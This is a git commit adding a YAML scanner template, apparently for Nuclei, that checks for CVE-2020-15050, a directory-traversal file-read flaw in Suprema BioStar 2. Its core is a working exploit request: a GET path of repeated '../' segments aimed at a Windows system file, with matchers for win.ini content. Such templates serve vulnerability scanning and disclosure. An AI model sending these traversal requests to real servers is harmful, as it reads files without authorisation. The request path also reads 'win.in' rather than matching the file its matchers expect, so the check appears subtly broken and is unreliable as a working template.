Create CVE-2020-15050.yaml

An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2022-03-07 19:19:01 +09:00 · 2022-03-07 19:19:01 +09:00 · ba14674e22
parent f7e32b1f1f
commit ba14674e22
1 changed files with 29 additions and 0 deletions
--- a/cves/2020/CVE-2020-15050.yaml
+++ b/cves/2020/CVE-2020-15050.yaml
@ -0,0 +1,29 @@
+id: CVE-2020-15050
+
+info:
+  name: Suprema BioStar2 - Local File Inclusion (LFI)
+  author: gy741
+  severity: high
+  description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
+  reference:
+    - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
+  tags: cve,cve2020,lfi,suprema,biostar2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.50
+    cve-id: CVE-2020-15050
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.in"
+
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body